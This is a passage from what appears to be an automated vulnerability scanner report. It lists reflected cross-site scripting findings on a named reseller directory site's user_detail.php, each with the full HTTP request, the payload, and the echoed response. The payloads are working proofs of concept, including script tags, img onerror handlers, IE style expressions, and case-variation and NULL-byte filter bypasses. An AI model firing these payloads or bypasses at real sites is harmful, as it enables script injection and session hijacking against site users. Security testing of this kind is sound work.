GET /user_detail.phpe8d77<a>bc8a110f9f6?u=erammequetern HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:07:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /user_detail.phpe8d77<a>bc8a110f9f6?u=erammequetern was not found on this server.</p>
...[SNIP]...

2.4917. http://www.resellerbase.com/user_detail.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 896d4<script>alert(1)</script>19318484e20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user_detail.php896d4<script>alert(1)</script>19318484e20 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:09:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /user_detail.php896d4<script>alert(1)</script>19318484e20 was not found on this server.</p>
...[SNIP]...

2.4918. http://www.resellerbase.com/user_detail.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 777fd<ScRiPt>alert(1)</ScRiPt>c80b932e2c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /user_detail.php777fd<ScRiPt>alert(1)</ScRiPt>c80b932e2c3?u=creeftmic HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:03:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /user_detail.php777fd<ScRiPt>alert(1)</ScRiPt>c80b932e2c3?u=creeftmic was not found on this server.</p>
...[SNIP]...

2.4919. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0021973"%20style%3dx%3aexpr/**/ession(alert(1))%2012eb50242e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21973\" style=x:expr/**/ession(alert(1)) 12eb50242e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /user_detail.php?u=pingpo/%0021973"%20style%3dx%3aexpr/**/ession(alert(1))%2012eb50242e8nger HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=pingpo/\021973\" style=x:expr/**/ession(alert(1)) 12eb50242e8nger">
...[SNIP]...

2.4920. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6c77b<img%20src%3da%20onerror%3dalert(1)>9b2bc159d33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6c77b<img src=a onerror=alert(1)>9b2bc159d33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user_detail.php?u=1sta/6c77b<img%20src%3da%20onerror%3dalert(1)>9b2bc159d33ltor HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:09:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>1sta/6c77b<img src=a onerror=alert(1)>9b2bc159d33ltor</b>
...[SNIP]...

2.4921. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 66327<x%20style%3dx%3aexpr/**/ession(alert(1))>aa85b88a4f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66327<x style=x:expr/**/ession(alert(1))>aa85b88a4f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /user_detail.php?u=prodayt/66327<x%20style%3dx%3aexpr/**/ession(alert(1))>aa85b88a4f1ovar HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>prodayt/66327<x style=x:expr/**/ession(alert(1))>aa85b88a4f1ovar</b>
...[SNIP]...

2.4922. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ab481<x%20style%3dx%3aexpr/**/ession(alert(1))>965db799b2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab481<x style=x:expr/**/ession(alert(1))>965db799b2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /user_detail.php?u=rulacru/ab481<x%20style%3dx%3aexpr/**/ession(alert(1))>965db799b2csbal HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>rulacru/ab481<x style=x:expr/**/ession(alert(1))>965db799b2csbal</b>
...[SNIP]...

2.4923. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0090715<img%20src%3da%20onerror%3dalert(1)>90e5d718130 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90715<img src=a onerror=alert(1)>90e5d718130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /user_detail.php?u=hed/%0090715<img%20src%3da%20onerror%3dalert(1)>90e5d718130icky HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:03:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>hed/\090715<img src=a onerror=alert(1)>90e5d718130icky</b>
...[SNIP]...

2.4924. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4177"%20style%3dx%3aexpression(alert(1))%20a7f45314bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4177\" style=x:expression(alert(1)) a7f45314bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /user_detail.php?u=foxyladyt/b4177"%20style%3dx%3aexpression(alert(1))%20a7f45314bfexas HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:05:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=foxyladyt/b4177\" style=x:expression(alert(1)) a7f45314bfexas">
...[SNIP]...

2.4925. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68115"><img%20src%3da%20onerror%3dalert(1)>9a729812136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68115\"><img src=a onerror=alert(1)>9a729812136 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user_detail.php?u=1sta/68115"><img%20src%3da%20onerror%3dalert(1)>9a729812136ltor HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:09:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=1sta/68115\"><img src=a onerror=alert(1)>9a729812136ltor">
...[SNIP]...

2.4926. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 437a2"%20a%3db%20b9b0dbcc88e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 437a2\" a=b b9b0dbcc88e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_detail.php?u=tager/437a2"%20a%3db%20b9b0dbcc88eorry HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=tager/437a2\" a=b b9b0dbcc88eorry">
...[SNIP]...

2.4927. http://www.resellerbase.com/user_detail.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c7e7"><a>f2367450f8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c7e7\"><a>f2367450f8a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_detail.php?u=prodayt/1c7e7"><a>f2367450f8aovar HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:13:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=prodayt/1c7e7\"><a>f2367450f8aovar">
...[SNIP]...

2.4928. http://www.resellerbase.com/user_detail.php [u parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ff0b"><a>53c218f041d was submitted in the u parameter. This input was echoed as 9ff0b\"><a>53c218f041d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user_detail.php?u=trikkegallillie9ff0b"><a>53c218f041d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=trikkegallillie9ff0b\"><a>53c218f041d">
...[SNIP]...

2.4929. http://www.resellerbase.com/user_detail.php [u parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f1f1f"><a%20b%3dc>4913079adb5 was submitted in the u parameter. This input was echoed as f1f1f\"><a b=c>4913079adb5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /user_detail.php?u=sungak%00f1f1f"><a%20b%3dc>4913079adb5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:15:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=sungak\0f1f1f\"><a b=c>4913079adb5">
...[SNIP]...

2.4930. http://www.resellerbase.com/user_detail.php [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload 1f42d<img%20src%3da%20onerror%3dalert(1)>48035a379b2 was submitted in the u parameter. This input was echoed as 1f42d<img src=a onerror=alert(1)>48035a379b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user_detail.php?u=admin1f42d<img%20src%3da%20onerror%3dalert(1)>48035a379b2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>admin1f42d<img src=a onerror=alert(1)>48035a379b2</b>
...[SNIP]...

2.4931. http://www.resellerbase.com/user_detail.php [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload %00387b9<x%20style%3dx%3aexpr/**/ession(alert(1))>b11478c237 was submitted in the u parameter. This input was echoed as 387b9<x style=x:expr/**/ession(alert(1))>b11478c237 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /user_detail.php?u=rijiy%00387b9<x%20style%3dx%3aexpr/**/ession(alert(1))>b11478c237 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<b>rijiy\0387b9<x style=x:expr/**/ession(alert(1))>b11478c237</b>
...[SNIP]...

2.4932. http://www.resellerbase.com/user_detail.php [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2c1"><img%20src%3da%20onerror%3dalert(1)>632a75cc10 was submitted in the u parameter. This input was echoed as 4b2c1\"><img src=a onerror=alert(1)>632a75cc10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user_detail.php?u=admin4b2c1"><img%20src%3da%20onerror%3dalert(1)>632a75cc10 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<a href="http://www.resellerbase.com/sendmail.php?u=admin4b2c1\"><img src=a onerror=alert(1)>632a75cc10">
...[SNIP]...

2.4933. http://www.resellerbase.com/user_detail.php [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /user_detail.php

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload %00b588e<img%20src%3da%20onerror%3dalert(1)>93341557b13 was submitted in the u parameter. This input was echoed as b588e<img src=a onerror=alert(1)>93341557b13 in the application's response.

